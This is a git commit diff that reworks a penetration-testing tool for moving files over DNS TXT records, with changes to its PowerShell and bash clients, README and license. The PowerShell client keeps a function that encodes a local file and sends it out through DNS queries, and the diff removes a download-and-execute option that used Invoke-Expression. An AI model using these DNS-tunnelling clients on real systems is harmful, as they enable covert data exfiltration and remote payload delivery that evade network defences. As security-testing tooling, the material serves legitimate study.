Minimal working examples added, README and LICENSE adjusted

LICENSE

@@ -1,6 +1,6 @@
 MIT License
 
-Copyright (c) 2016 Pen Test Partners
+Copyright (c) 2022 Simon Moser
 
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal

README.md

@@ -1,16 +1,17 @@
-# Uninvited-Guest
+# DNS File-Transfer
-Uninvited Guest - A file server for files over DNS TXT records
+A file server for files over DNS TXT records
 
+## Requirements on server
+- *Python3*
+- *dnslib:* e.g. `pip3 install dnslib`
+
+## Usage
 First set up your domain to point to which ever server you're hosting this on.
 
-Then run the python server
+Then run the python server:
 
-./server --domain domainname.com --directory /dir/of/tools
+`./server.py --domain domainname.com --directory /dir/of/tools`
 
 It will only support a flat directory structure in /dir/of/tools
 
-You will need to write your own client to receive files. The count of items will be in file.count.domainname.com and the strings will be in file.number.domainname.com.
+Strongly based on [Uninvited Guest by Pen Test Partners](https://github.com/pentestpartners/Uninvited-Guest)
-
-An example bash client would be something like:
-
-f="pwned.png";d="6-9.eu";c=$(dig +short txt $f.count.$d|tr -d \");for i in $(seq 0 $c);do echo -n $(dig +short txt $f.$i.$d|tr -d \");done | base64 -d > /tmp/pwned.png

client.ps1

@@ -1,10 +1,8 @@
 # Simple Powershell client, also runs on linux with Powershell Core
 Function Get-DnsTxt {
-    [CmdletBinding()] param(
+    [CmdletBinding()] param([string] $Domain)
-        [string] $Domain
-    )
     Try {
-        return (Resolve-DnsName -Type TXT $Domain | Select-Object Strings | Format-Table -HideTableHeaders | Out-String -Width 1000).Replace("{", "").Replace("}", "").Trim()
+        return (Resolve-DnsName -Type TXT $Domain).Strings
     } Catch [System.Management.Automation.CommandNotFoundException] {
         return dig +short $Domain TXT
     }
@@ -13,27 +11,14 @@ Function Get-DnsTxt {
 Function Get-DnsFile {
     [CmdletBinding()] param(
         [string] $FileName = $(Read-Host -Prompt 'Enter a FileName'),
-        [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName'),
+        [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName')
-        [switch] $Execute,
-        [switch] $Write,
-        [string] $OutPath
     )
     $count = [int](Get-DnsTxt -Domain "$FileName.count.$DnsName")
     $file_base64 = ""
     For ($i=0; $i -le $count; $i++) {
         $file_base64 += (Get-DnsTxt -Domain "$FileName.$i.$DnsName")
     }
-    "Base64 $file_base64"
+    [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($file_base64))
-    $file_string = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($file_base64))
-    "String $file_string"
-    If ($Execute.IsPresent) {
-        $file_string | Invoke-Expression
-    } Else {
-        $file_string | Out-String
-    }
-    If ($Write.IsPresent) {
-        $file_string | Out-File -FilePath ($OutPath, $FileName)[!$OutPath]
-    }
 }
 
 Function Push-DNSFile {
@@ -41,22 +26,30 @@ Function Push-DNSFile {
         [string] $FileName = $(Read-Host -Prompt 'Enter a Filename'),
         [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName')
     )
-    $id = (Get-FileHash $FileName | Select-Object Hash | Format-Table -HideTableHeaders | Out-String).Trim()
+    $id = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-FileHash $FileName).Hash)).Substring(0,6)
-    $id = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($id)).Substring(0,6)
+    $content = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content -Path $FileName)))
-    $content_binary = Get-Content -Path $FileName -Encoding utf8
-    $content_base64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($content_binary))
     $i = 0
-    While ($content_base64) {
+    While ($true) {
-        $url = "."+$i+"-"+$id+"u."+$DnsName
+        $url = ".$i-${id}u.$DnsName"
         $len = 63 - $url.Length
-        if($len -le $content_base64.Length) {
+        $i++
-            $content_part = $content_base64.Substring(0, $len)
+        if($len -lt $content.Length) {
-            $content_base64 = $content_base64.Substring($len)
+            Get-DnsTxt -Domain ($content.Substring(0, $len) + $url)
+            $content = $content.Substring($len)
         } else {
-            $content_part = $content_base64
+            Get-DnsTxt -Domain ($content + $url)
-            $content_base64 = $false
+            break
         }
-        Get-DnsTxt -Domain ($content_part + $url)
-        $i++
     }
 }
+
+# Minimal working example for download in case you have to type it all manually
+Function MWE {
+    param([string] $f, [string] $d)
+    $c = [int]((Resolve-DnsName -Type TXT "$f.count.$d").Strings)
+    $o = ""
+    For ($i=0; $i -le $c; $i++) {
+        $o += (Resolve-DnsName -Type TXT "$f.$i.$d").Strings
+    }
+    [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($o))
+}

client.sh

@@ -20,3 +20,9 @@ else
     fi
   done
 fi
+
+# Minimal working example for download in case you have to type it all manually
+mwe() {
+  f=$1; s=$2; c=$(dig +short txt "$f".count."$s"|tr -d \")
+  for i in $(seq 0 "$c"); do echo -n "$(dig +short txt "$f"."$i"."$s"|tr -d \")"; done | base64 -d > "$f"
+}

server.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env /usr/bin/python
+#!/usr/bin/env /usr/bin/python3
 # -*- coding: utf-8 -*-
 
 """